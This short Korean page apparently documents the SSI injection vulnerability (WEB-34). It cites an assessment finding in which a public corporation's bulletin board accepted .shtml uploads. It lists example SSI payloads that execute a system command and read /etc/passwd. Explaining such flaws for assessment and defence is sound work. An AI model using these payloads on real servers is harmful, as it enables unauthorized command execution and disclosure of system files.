Server-Side Includes (SSI) 게시판 — WEB-34
WEB-34 SSI Injection
💡 실제 발견 사례: 고양도시관리공사 웹 취약점 진단 결과
게시판 첨부파일 기능에서 .shtml 파일 업로드를 허용하여 SSI 명령어 실행 가능
공격 예시:
<!--#exec cmd="id" --> — 시스템 명령어 실행
<!--#include file="/etc/passwd" --> — 파일 읽기
<!--#set var="foo" value="bar" --> — 변수 설정